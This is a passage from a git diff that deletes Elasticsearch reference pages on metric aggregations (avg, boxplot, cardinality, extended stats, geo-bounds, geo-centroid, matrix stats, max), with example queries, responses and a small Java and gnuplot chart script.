but it is also possible to treat them as if they -had a value. - -[source,console] --------------------------------------------------- -POST /exams/_search?size=0 -{ - "aggs": { - "grade_avg": { - "avg": { - "field": "grade", - "missing": 10 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - -<1> Documents without a value in the `grade` field will fall into the same bucket as documents that have the value `10`. - - -[[search-aggregations-metrics-avg-aggregation-histogram-fields]] -==== Histogram fields -When average is computed on <>, the result of the aggregation is the weighted average -of all elements in the `values` array taking into consideration the number in the same position in the `counts` array. - -For example, for the following index that stores pre-aggregated histograms with latency metrics for different networks: - -[source,console] --------------------------------------------------- -PUT metrics_index/_doc/1 -{ - "network.name" : "net-1", - "latency_histo" : { - "values" : [0.1, 0.2, 0.3, 0.4, 0.5], <1> - "counts" : [3, 7, 23, 12, 6] <2> - } -} - -PUT metrics_index/_doc/2 -{ - "network.name" : "net-2", - "latency_histo" : { - "values" : [0.1, 0.2, 0.3, 0.4, 0.5], <1> - "counts" : [8, 17, 8, 7, 6] <2> - } -} - -POST /metrics_index/_search?size=0 -{ - "aggs": { - "avg_latency": - { "avg": { "field": "latency_histo" } - } - } -} --------------------------------------------------- - -For each histogram field the `avg` aggregation adds each number in the `values` array <1> multiplied by its associated count -in the `counts` array <2>. Eventually, it will compute the average over those values for all histograms and return the following result: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "avg_latency": { - "value": 0.29690721649 - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:test not setup] diff --git a/docs/reference/aggregations/metrics/boxplot-aggregation.asciidoc b/docs/reference/aggregations/metrics/boxplot-aggregation.asciidoc deleted file mode 100644 index 4d0c48d3527..00000000000 --- a/docs/reference/aggregations/metrics/boxplot-aggregation.asciidoc +++ /dev/null @@ -1,189 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[search-aggregations-metrics-boxplot-aggregation]] -=== Boxplot aggregation -++++ -Boxplot -++++ - -A `boxplot` metrics aggregation that computes boxplot of numeric values extracted from the aggregated documents. -These values can be generated by a provided script or extracted from specific numeric or -<> in the documents. - -The `boxplot` aggregation returns essential information for making a {wikipedia}/Box_plot[box plot]: minimum, maximum -median, first quartile (25th percentile) and third quartile (75th percentile) values. - -==== Syntax - -A `boxplot` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "boxplot": { - "field": "load_time" - } -} --------------------------------------------------- -// NOTCONSOLE - -Let's look at a boxplot representing load time: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_boxplot": { - "boxplot": { - "field": "load_time" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] -<1> The field `load_time` must be a numeric field - -The response will look like this: - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "load_time_boxplot": { - "min": 0.0, - "max": 990.0, - "q1": 165.0, - "q2": 445.0, - "q3": 725.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -==== Script - -The boxplot metric supports scripting. For example, if our load times -are in milliseconds but we want values calculated in seconds, we could use -a script to convert them on-the-fly: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_boxplot": { - "boxplot": { - "script": { - "lang": "painless", - "source": "doc['load_time'].value / params.timeUnit", <1> - "params": { - "timeUnit": 1000 <2> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -<1> The `field` parameter is replaced with a `script` parameter, which uses the -script to generate values which percentiles are calculated on -<2> Scripting supports parameterized input just like any other script - -This will interpret the `script` parameter as an `inline` script with the `painless` script language and no script parameters. To use a -stored script use the following syntax: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_boxplot": { - "boxplot": { - "script": { - "id": "my_script", - "params": { - "field": "load_time" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:latency,stored_example_script] - -[[search-aggregations-metrics-boxplot-aggregation-approximation]] -==== Boxplot values are (usually) approximate - -The algorithm used by the `boxplot` metric is called TDigest (introduced by -Ted Dunning in -https://github.com/tdunning/t-digest/blob/master/docs/t-digest-paper/histo.pdf[Computing Accurate Quantiles using T-Digests]). - -[WARNING] -==== -Boxplot as other percentile aggregations are also -{wikipedia}/Nondeterministic_algorithm[non-deterministic]. -This means you can get slightly different results using the same data. -==== - -[[search-aggregations-metrics-boxplot-aggregation-compression]] -==== Compression - -Approximate algorithms must balance memory utilization with estimation accuracy. -This balance can be controlled using a `compression` parameter: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_boxplot": { - "boxplot": { - "field": "load_time", - "compression": 200 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -<1> Compression controls memory usage and approximation error - -include::percentile-aggregation.asciidoc[tags=t-digest] - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they -had a value. - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "grade_boxplot": { - "boxplot": { - "field": "grade", - "missing": 10 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -<1> Documents without a value in the `grade` field will fall into the same bucket as documents that have the value `10`. diff --git a/docs/reference/aggregations/metrics/cardinality-aggregation.asciidoc b/docs/reference/aggregations/metrics/cardinality-aggregation.asciidoc deleted file mode 100644 index 409af6cc7df..00000000000 --- a/docs/reference/aggregations/metrics/cardinality-aggregation.asciidoc +++ /dev/null @@ -1,249 +0,0 @@ -[[search-aggregations-metrics-cardinality-aggregation]] -=== Cardinality aggregation -++++ -Cardinality -++++ - -A `single-value` metrics aggregation that calculates an approximate count of -distinct values. Values can be extracted either from specific fields in the -document or generated by a script. - -Assume you are indexing store sales and would like to count the unique number of sold products that match a query: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "type_count": { - "cardinality": { - "field": "type" - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "type_count": { - "value": 3 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -==== Precision control - -This aggregation also supports the `precision_threshold` option: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "type_count": { - "cardinality": { - "field": "type", - "precision_threshold": 100 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> The `precision_threshold` options allows to trade memory for accuracy, and -defines a unique count below which counts are expected to be close to -accurate. Above this value, counts might become a bit more fuzzy. The maximum -supported value is 40000, thresholds above this number will have the same -effect as a threshold of 40000. The default value is +3000+. - -==== Counts are approximate - -Computing exact counts requires loading values into a hash set and returning its -size. This doesn't scale when working on high-cardinality sets and/or large -values as the required memory usage and the need to communicate those -per-shard sets between nodes would utilize too many resources of the cluster. - -This `cardinality` aggregation is based on the -https://static.googleusercontent.com/media/research.google.com/fr//pubs/archive/40671.pdf[HyperLogLog++] -algorithm, which counts based on the hashes of the values with some interesting -properties: - - * configurable precision, which decides on how to trade memory for accuracy, - * excellent accuracy on low-cardinality sets, - * fixed memory usage: no matter if there are tens or billions of unique values, - memory usage only depends on the configured precision. - -For a precision threshold of `c`, the implementation that we are using requires -about `c * 8` bytes. - -The following chart shows how the error varies before and after the threshold: - -//// -To generate this chart use this gnuplot script: -[source,gnuplot] -------- -#!/usr/bin/gnuplot -reset -set terminal png size 1000,400 - -set xlabel "Actual cardinality" -set logscale x - -set ylabel "Relative error (%)" -set yrange [0:8] - -set title "Cardinality error" -set grid - -set style data lines - -plot "test.dat" using 1:2 title "threshold=100", \ -"" using 1:3 title "threshold=1000", \ -"" using 1:4 title "threshold=10000" -# -------- - -and generate data in a 'test.dat' file using the below Java code: - -[source,java] -------- -private static double error(HyperLogLogPlusPlus h, long expected) { - double actual = h.cardinality(0); - return Math.abs(expected - actual) / expected; -} - -public static void main(String[] args) { - HyperLogLogPlusPlus h100 = new HyperLogLogPlusPlus(precisionFromThreshold(100), BigArrays.NON_RECYCLING_INSTANCE, 1); - HyperLogLogPlusPlus h1000 = new HyperLogLogPlusPlus(precisionFromThreshold(1000), BigArrays.NON_RECYCLING_INSTANCE, 1); - HyperLogLogPlusPlus h10000 = new HyperLogLogPlusPlus(precisionFromThreshold(10000), BigArrays.NON_RECYCLING_INSTANCE, 1); - - int next = 100; - int step = 10; - - for (int i = 1; i <= 10000000; ++i) { - long h = BitMixer.mix64(i); - h100.collect(0, h); - h1000.collect(0, h); - h10000.collect(0, h); - - if (i == next) { - System.out.println(i + " " + error(h100, i)*100 + " " + error(h1000, i)*100 + " " + error(h10000, i)*100); - next += step; - if (next >= 100 * step) { - step *= 10; - } - } - } -} -------- - -//// - -image:images/cardinality_error.png[] - -For all 3 thresholds, counts have been accurate up to the configured threshold. -Although not guaranteed, this is likely to be the case. Accuracy in practice depends -on the dataset in question. In general, most datasets show consistently good -accuracy. Also note that even with a threshold as low as 100, the error -remains very low (1-6% as seen in the above graph) even when counting millions of items. - -The HyperLogLog++ algorithm depends on the leading zeros of hashed -values, the exact distributions of hashes in a dataset can affect the -accuracy of the cardinality. - -Please also note that even with a threshold as low as 100, the error remains -very low, even when counting millions of items. - -==== Pre-computed hashes - -On string fields that have a high cardinality, it might be faster to store the -hash of your field values in your index and then run the cardinality aggregation -on this field. This can either be done by providing hash values from client-side -or by letting Elasticsearch compute hash values for you by using the -{plugins}/mapper-murmur3.html[`mapper-murmur3`] plugin. - -NOTE: Pre-computing hashes is usually only useful on very large and/or -high-cardinality fields as it saves CPU and memory. However, on numeric -fields, hashing is very fast and storing the original values requires as much -or less memory than storing the hashes. This is also true on low-cardinality -string fields, especially given that those have an optimization in order to -make sure that hashes are computed at most once per unique value per segment. - -==== Script - -The `cardinality` metric supports scripting, with a noticeable performance hit -however since hashes need to be computed on the fly. - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "type_promoted_count": { - "cardinality": { - "script": { - "lang": "painless", - "source": "doc['type'].value + ' ' + doc['promoted'].value" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -This will interpret the `script` parameter as an `inline` script with the `painless` script language and no script parameters. To use a stored script use the following syntax: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "type_promoted_count": { - "cardinality": { - "script": { - "id": "my_script", - "params": { - "type_field": "type", - "promoted_field": "promoted" - } - } - } - } - } -} --------------------------------------------------- -// TEST[skip:no script] - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they -had a value. - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "tag_cardinality": { - "cardinality": { - "field": "tag", - "missing": "N/A" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -<1> Documents without a value in the `tag` field will fall into the same bucket as documents that have the value `N/A`. diff --git a/docs/reference/aggregations/metrics/extendedstats-aggregation.asciidoc b/docs/reference/aggregations/metrics/extendedstats-aggregation.asciidoc deleted file mode 100644 index c6283c3867f..00000000000 --- a/docs/reference/aggregations/metrics/extendedstats-aggregation.asciidoc +++ /dev/null @@ -1,197 +0,0 @@ -[[search-aggregations-metrics-extendedstats-aggregation]] -=== Extended stats aggregation -++++ -Extended stats -++++ - -A `multi-value` metrics aggregation that computes stats over numeric values extracted from the aggregated documents. These values can be extracted either from specific numeric fields in the documents, or be generated by a provided script. - -The `extended_stats` aggregations is an extended version of the <> aggregation, where additional metrics are added such as `sum_of_squares`, `variance`, `std_deviation` and `std_deviation_bounds`. - -Assuming the data consists of documents representing exams grades (between 0 and 100) of students - -[source,console] --------------------------------------------------- -GET /exams/_search -{ - "size": 0, - "aggs": { - "grades_stats": { "extended_stats": { "field": "grade" } } - } -} --------------------------------------------------- -// TEST[setup:exams] - -The above aggregation computes the grades statistics over all documents. The aggregation type is `extended_stats` and the `field` setting defines the numeric field of the documents the stats will be computed on. The above will return the following: - -The `std_deviation` and `variance` are calculated as population metrics so they are always the same as `std_deviation_population` and `variance_population` respectively. - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "grades_stats": { - "count": 2, - "min": 50.0, - "max": 100.0, - "avg": 75.0, - "sum": 150.0, - "sum_of_squares": 12500.0, - "variance": 625.0, - "variance_population": 625.0, - "variance_sampling": 1250.0, - "std_deviation": 25.0, - "std_deviation_population": 25.0, - "std_deviation_sampling": 35.35533905932738, - "std_deviation_bounds": { - "upper": 125.0, - "lower": 25.0, - "upper_population": 125.0, - "lower_population": 25.0, - "upper_sampling": 145.71067811865476, - "lower_sampling": 4.289321881345245 - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -The name of the aggregation (`grades_stats` above) also serves as the key by which the aggregation result can be retrieved from the returned response. - -==== Standard Deviation Bounds -By default, the `extended_stats` metric will return an object called `std_deviation_bounds`, which provides an interval of plus/minus two standard -deviations from the mean. This can be a useful way to visualize variance of your data. If you want a different boundary, for example -three standard deviations, you can set `sigma` in the request: - -[source,console] --------------------------------------------------- -GET /exams/_search -{ - "size": 0, - "aggs": { - "grades_stats": { - "extended_stats": { - "field": "grade", - "sigma": 3 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] -<1> `sigma` controls how many standard deviations +/- from the mean should be displayed - -`sigma` can be any non-negative double, meaning you can request non-integer values such as `1.5`. A value of `0` is valid, but will simply -return the average for both `upper` and `lower` bounds. - -The `upper` and `lower` bounds are calculated as population metrics so they are always the same as `upper_population` and -`lower_population` respectively. - -.Standard Deviation and Bounds require normality -[NOTE] -===== -The standard deviation and its bounds are displayed by default, but they are not always applicable to all data-sets. Your data must -be normally distributed for the metrics to make sense. The statistics behind standard deviations assumes normally distributed data, so -if your data is skewed heavily left or right, the value returned will be misleading. -===== - -==== Script - -Computing the grades stats based on a script: - -[source,console] --------------------------------------------------- -GET /exams/_search -{ - "size": 0, - "aggs": { - "grades_stats": { - "extended_stats": { - "script": { - "source": "doc['grade'].value", - "lang": "painless" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - -This will interpret the `script` parameter as an `inline` script with the `painless` script language and no script parameters. To use a stored script use the following syntax: - -[source,console] --------------------------------------------------- -GET /exams/_search -{ - "size": 0, - "aggs": { - "grades_stats": { - "extended_stats": { - "script": { - "id": "my_script", - "params": { - "field": "grade" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams,stored_example_script] - -===== Value Script - -It turned out that the exam was way above the level of the students and a grade correction needs to be applied. We can use value script to get the new stats: - -[source,console] --------------------------------------------------- -GET /exams/_search -{ - "size": 0, - "aggs": { - "grades_stats": { - "extended_stats": { - "field": "grade", - "script": { - "lang": "painless", - "source": "_value * params.correction", - "params": { - "correction": 1.2 - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they -had a value. - -[source,console] --------------------------------------------------- -GET /exams/_search -{ - "size": 0, - "aggs": { - "grades_stats": { - "extended_stats": { - "field": "grade", - "missing": 0 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - -<1> Documents without a value in the `grade` field will fall into the same bucket as documents that have the value `0`. diff --git a/docs/reference/aggregations/metrics/geobounds-aggregation.asciidoc b/docs/reference/aggregations/metrics/geobounds-aggregation.asciidoc deleted file mode 100644 index 51d551b67db..00000000000 --- a/docs/reference/aggregations/metrics/geobounds-aggregation.asciidoc +++ /dev/null @@ -1,155 +0,0 @@ -[[search-aggregations-metrics-geobounds-aggregation]] -=== Geo-bounds aggregation -++++ -Geo-bounds -++++ - -A metric aggregation that computes the bounding box containing all geo values for a field. - -Example: - -[source,console] --------------------------------------------------- -PUT /museums -{ - "mappings": { - "properties": { - "location": { - "type": "geo_point" - } - } - } -} - -POST /museums/_bulk?refresh -{"index":{"_id":1}} -{"location": "52.374081,4.912350", "name": "NEMO Science Museum"} -{"index":{"_id":2}} -{"location": "52.369219,4.901618", "name": "Museum Het Rembrandthuis"} -{"index":{"_id":3}} -{"location": "52.371667,4.914722", "name": "Nederlands Scheepvaartmuseum"} -{"index":{"_id":4}} -{"location": "51.222900,4.405200", "name": "Letterenhuis"} -{"index":{"_id":5}} -{"location": "48.861111,2.336389", "name": "Musée du Louvre"} -{"index":{"_id":6}} -{"location": "48.860000,2.327000", "name": "Musée d'Orsay"} - -POST /museums/_search?size=0 -{ - "query": { - "match": { "name": "musée" } - }, - "aggs": { - "viewport": { - "geo_bounds": { - "field": "location", <1> - "wrap_longitude": true <2> - } - } - } -} --------------------------------------------------- - -<1> The `geo_bounds` aggregation specifies the field to use to obtain the bounds. -<2> [[geo-bounds-wrap-longitude]] `wrap_longitude` is an optional parameter which specifies whether the bounding box should be allowed to overlap the international date line. The default value is `true`. - -The above aggregation demonstrates how one would compute the bounding box of the location field for all documents with a business type of shop - -The response for the above aggregation: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "viewport": { - "bounds": { - "top_left": { - "lat": 48.86111099738628, - "lon": 2.3269999679178 - }, - "bottom_right": { - "lat": 48.85999997612089, - "lon": 2.3363889567553997 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - -[discrete] -[role="xpack"] -[[geobounds-aggregation-geo-shape]] -==== Geo Bounds Aggregation on `geo_shape` fields - -The Geo Bounds Aggregation is also supported on `geo_shape` fields. - -If <> is set to `true` -(the default), the bounding box can overlap the international date line and -return a bounds where the `top_left` longitude is larger than the `top_right` -longitude. - -For example, the upper right longitude will typically be greater than the lower -left longitude of a geographic bounding box. However, when the area -crosses the 180° meridian, the value of the lower left longitude will be -greater than the value of the upper right longitude. See -http://docs.opengeospatial.org/is/12-063r5/12-063r5.html#30[Geographic bounding box] on the Open Geospatial Consortium website for more information. - -Example: - -[source,console] --------------------------------------------------- -PUT /places -{ - "mappings": { - "properties": { - "geometry": { - "type": "geo_shape" - } - } - } -} - -POST /places/_bulk?refresh -{"index":{"_id":1}} -{"name": "NEMO Science Museum", "geometry": "POINT(4.912350 52.374081)" } -{"index":{"_id":2}} -{"name": "Sportpark De Weeren", "geometry": { "type": "Polygon", "coordinates": [ [ [ 4.965305328369141, 52.39347642069457 ], [ 4.966979026794433, 52.391721758934835 ], [ 4.969425201416015, 52.39238958618537 ], [ 4.967944622039794, 52.39420969150824 ], [ 4.965305328369141, 52.39347642069457 ] ] ] } } - -POST /places/_search?size=0 -{ - "aggs": { - "viewport": { - "geo_bounds": { - "field": "geometry" - } - } - } -} --------------------------------------------------- -// TEST - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "viewport": { - "bounds": { - "top_left": { - "lat": 52.39420966710895, - "lon": 4.912349972873926 - }, - "bottom_right": { - "lat": 52.374080987647176, - "lon": 4.969425117596984 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] diff --git a/docs/reference/aggregations/metrics/geocentroid-aggregation.asciidoc b/docs/reference/aggregations/metrics/geocentroid-aggregation.asciidoc deleted file mode 100644 index 2658ab6683d..00000000000 --- a/docs/reference/aggregations/metrics/geocentroid-aggregation.asciidoc +++ /dev/null @@ -1,244 +0,0 @@ -[[search-aggregations-metrics-geocentroid-aggregation]] -=== Geo-centroid aggregation -++++ -Geo-centroid -++++ - -A metric aggregation that computes the weighted {wikipedia}/Centroid[centroid] from all coordinate values for geo fields. - -Example: - -[source,console] --------------------------------------------------- -PUT /museums -{ - "mappings": { - "properties": { - "location": { - "type": "geo_point" - } - } - } -} - -POST /museums/_bulk?refresh -{"index":{"_id":1}} -{"location": "52.374081,4.912350", "city": "Amsterdam", "name": "NEMO Science Museum"} -{"index":{"_id":2}} -{"location": "52.369219,4.901618", "city": "Amsterdam", "name": "Museum Het Rembrandthuis"} -{"index":{"_id":3}} -{"location": "52.371667,4.914722", "city": "Amsterdam", "name": "Nederlands Scheepvaartmuseum"} -{"index":{"_id":4}} -{"location": "51.222900,4.405200", "city": "Antwerp", "name": "Letterenhuis"} -{"index":{"_id":5}} -{"location": "48.861111,2.336389", "city": "Paris", "name": "Musée du Louvre"} -{"index":{"_id":6}} -{"location": "48.860000,2.327000", "city": "Paris", "name": "Musée d'Orsay"} - -POST /museums/_search?size=0 -{ - "aggs": { - "centroid": { - "geo_centroid": { - "field": "location" <1> - } - } - } -} --------------------------------------------------- - -<1> The `geo_centroid` aggregation specifies the field to use for computing the centroid. (NOTE: field must be a <> type) - -The above aggregation demonstrates how one would compute the centroid of the location field for all documents with a crime type of burglary. - -The response for the above aggregation: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "centroid": { - "location": { - "lat": 51.00982965203002, - "lon": 3.9662131341174245 - }, - "count": 6 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - -The `geo_centroid` aggregation is more interesting when combined as a sub-aggregation to other bucket aggregations. - -Example: - -[source,console] --------------------------------------------------- -POST /museums/_search?size=0 -{ - "aggs": { - "cities": { - "terms": { "field": "city.keyword" }, - "aggs": { - "centroid": { - "geo_centroid": { "field": "location" } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -The above example uses `geo_centroid` as a sub-aggregation to a -<> bucket aggregation -for finding the central location for museums in each city. - -The response for the above aggregation: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "cities": { - "sum_other_doc_count": 0, - "doc_count_error_upper_bound": 0, - "buckets": [ - { - "key": "Amsterdam", - "doc_count": 3, - "centroid": { - "location": { - "lat": 52.371655656024814, - "lon": 4.909563297405839 - }, - "count": 3 - } - }, - { - "key": "Paris", - "doc_count": 2, - "centroid": { - "location": { - "lat": 48.86055548675358, - "lon": 2.3316944623366 - }, - "count": 2 - } - }, - { - "key": "Antwerp", - "doc_count": 1, - "centroid": { - "location": { - "lat": 51.22289997059852, - "lon": 4.40519998781383 - }, - "count": 1 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - - -[discrete] -[role="xpack"] -[[geocentroid-aggregation-geo-shape]] -==== Geo Centroid Aggregation on `geo_shape` fields - -The centroid metric for geo-shapes is more nuanced than for points. The centroid of a specific aggregation bucket -containing shapes is the centroid of the highest-dimensionality shape type in the bucket. For example, if a bucket contains -shapes comprising of polygons and lines, then the lines do not contribute to the centroid metric. Each type of shape's -centroid is calculated differently. Envelopes and circles ingested via the <> are treated -as polygons. - -|=== -|Geometry Type | Centroid Calculation - -|[Multi]Point -|equally weighted average of all the coordinates - -|[Multi]LineString -|a weighted average of all the centroids of each segment, where the weight of each segment is its length in degrees - -|[Multi]Polygon -|a weighted average of all the centroids of all the triangles of a polygon where the triangles are formed by every two consecutive vertices and the starting-point. - holes have negative weights. weights represent the area of the triangle in deg^2 calculated - -|GeometryCollection -|The centroid of all the underlying geometries with the highest dimension. If Polygons and Lines and/or Points, then lines and/or points are ignored. - If Lines and Points, then points are ignored -|=== - -Example: - -[source,console] --------------------------------------------------- -PUT /places -{ - "mappings": { - "properties": { - "geometry": { - "type": "geo_shape" - } - } - } -} - -POST /places/_bulk?refresh -{"index":{"_id":1}} -{"name": "NEMO Science Museum", "geometry": "POINT(4.912350 52.374081)" } -{"index":{"_id":2}} -{"name": "Sportpark De Weeren", "geometry": { "type": "Polygon", "coordinates": [ [ [ 4.965305328369141, 52.39347642069457 ], [ 4.966979026794433, 52.391721758934835 ], [ 4.969425201416015, 52.39238958618537 ], [ 4.967944622039794, 52.39420969150824 ], [ 4.965305328369141, 52.39347642069457 ] ] ] } } - -POST /places/_search?size=0 -{ - "aggs": { - "centroid": { - "geo_centroid": { - "field": "geometry" - } - } - } -} --------------------------------------------------- -// TEST - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "centroid": { - "location": { - "lat": 52.39296147599816, - "lon": 4.967404240742326 - }, - "count": 2 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - - -[WARNING] -.Using `geo_centroid` as a sub-aggregation of `geohash_grid` -==== -The <> -aggregation places documents, not individual geo-points, into buckets. If a -document's `geo_point` field contains <>, the document -could be assigned to multiple buckets, even if one or more of its geo-points are -outside the bucket boundaries. - -If a `geocentroid` sub-aggregation is also used, each centroid is calculated -using all geo-points in a bucket, including those outside the bucket boundaries. -This can result in centroids outside of bucket boundaries. -==== diff --git a/docs/reference/aggregations/metrics/matrix-stats-aggregation.asciidoc b/docs/reference/aggregations/metrics/matrix-stats-aggregation.asciidoc deleted file mode 100644 index edf84ec6425..00000000000 --- a/docs/reference/aggregations/metrics/matrix-stats-aggregation.asciidoc +++ /dev/null @@ -1,146 +0,0 @@ -[[search-aggregations-matrix-stats-aggregation]] -=== Matrix stats aggregation -++++ -Matrix stats -++++ - -The `matrix_stats` aggregation is a numeric aggregation that computes the following statistics over a set of document fields: - -[horizontal] -`count`:: Number of per field samples included in the calculation. -`mean`:: The average value for each field. -`variance`:: Per field Measurement for how spread out the samples are from the mean. -`skewness`:: Per field measurement quantifying the asymmetric distribution around the mean. -`kurtosis`:: Per field measurement quantifying the shape of the distribution. -`covariance`:: A matrix that quantitatively describes how changes in one field are associated with another. -`correlation`:: The covariance matrix scaled to a range of -1 to 1, inclusive. Describes the relationship between field - distributions. - -IMPORTANT: Unlike other metric aggregations, the `matrix_stats` aggregation does -not support scripting. - -////////////////////////// - -[source,js] --------------------------------------------------- -PUT /statistics/_doc/0 -{"poverty": 24.0, "income": 50000.0} - -PUT /statistics/_doc/1 -{"poverty": 13.0, "income": 95687.0} - -PUT /statistics/_doc/2 -{"poverty": 69.0, "income": 7890.0} - -POST /_refresh --------------------------------------------------- -// NOTCONSOLE -// TESTSETUP - -////////////////////////// - -The following example demonstrates the use of matrix stats to describe the relationship between income and poverty. - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "statistics": { - "matrix_stats": { - "fields": [ "poverty", "income" ] - } - } - } -} --------------------------------------------------- -// TEST[s/_search/_search\?filter_path=aggregations/] - -The aggregation type is `matrix_stats` and the `fields` setting defines the set of fields (as an array) for computing -the statistics. The above request returns the following response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "statistics": { - "doc_count": 50, - "fields": [ { - "name": "income", - "count": 50, - "mean": 51985.1, - "variance": 7.383377037755103E7, - "skewness": 0.5595114003506483, - "kurtosis": 2.5692365287787124, - "covariance": { - "income": 7.383377037755103E7, - "poverty": -21093.65836734694 - }, - "correlation": { - "income": 1.0, - "poverty": -0.8352655256272504 - } - }, { - "name": "poverty", - "count": 50, - "mean": 12.732000000000001, - "variance": 8.637730612244896, - "skewness": 0.4516049811903419, - "kurtosis": 2.8615929677997767, - "covariance": { - "income": -21093.65836734694, - "poverty": 8.637730612244896 - }, - "correlation": { - "income": -0.8352655256272504, - "poverty": 1.0 - } - } ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] -// TESTRESPONSE[s/: (\-)?[0-9\.E]+/: $body.$_path/] - -The `doc_count` field indicates the number of documents involved in the computation of the statistics. - -==== Multi Value Fields - -The `matrix_stats` aggregation treats each document field as an independent sample. The `mode` parameter controls what -array value the aggregation will use for array or multi-valued fields. This parameter can take one of the following: - -[horizontal] -`avg`:: (default) Use the average of all values. -`min`:: Pick the lowest value. -`max`:: Pick the highest value. -`sum`:: Use the sum of all values. -`median`:: Use the median of all values. - -==== Missing Values - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they had a value. -This is done by adding a set of fieldname : value mappings to specify default values per field. - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "matrixstats": { - "matrix_stats": { - "fields": [ "poverty", "income" ], - "missing": { "income": 50000 } <1> - } - } - } -} --------------------------------------------------- - -<1> Documents without a value in the `income` field will have the default value `50000`. - -==== Script - -This aggregation family does not yet support scripting. diff --git a/docs/reference/aggregations/metrics/max-aggregation.asciidoc b/docs/reference/aggregations/metrics/max-aggregation.asciidoc deleted file mode 100644 index cb6a3f64ab7..00000000000 --- a/docs/reference/aggregations/metrics/max-aggregation.asciidoc +++ /dev/null @@ -1,195 +0,0 @@ -[[search-aggregations-metrics-max-aggregation]] -=== Max aggregation -++++ -Max -++++ - -A `single-value` metrics aggregation that keeps track and returns the maximum -value among the numeric values extracted from the aggregated documents. These -values can be extracted either from specific numeric fields in the documents, -or be generated by a provided script. - -NOTE: The `min` and `max` aggregation operate on the `double` representation of -the data. As a consequence, the result may be approximate when running on longs -whose absolute value is greater than +2^53+. - -Computing the max price value across all documents - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "max_price": { "max": { "field": "price" } } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "max_price": { - "value": 200.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -As can be seen, the name of the aggregation (`max_price` above) also serves as -the key by which the aggregation result can be retrieved from the returned -response. - -==== Script - -The `max` aggregation can also calculate the maximum of a script. The example -below computes the maximum price: - -[source,console] 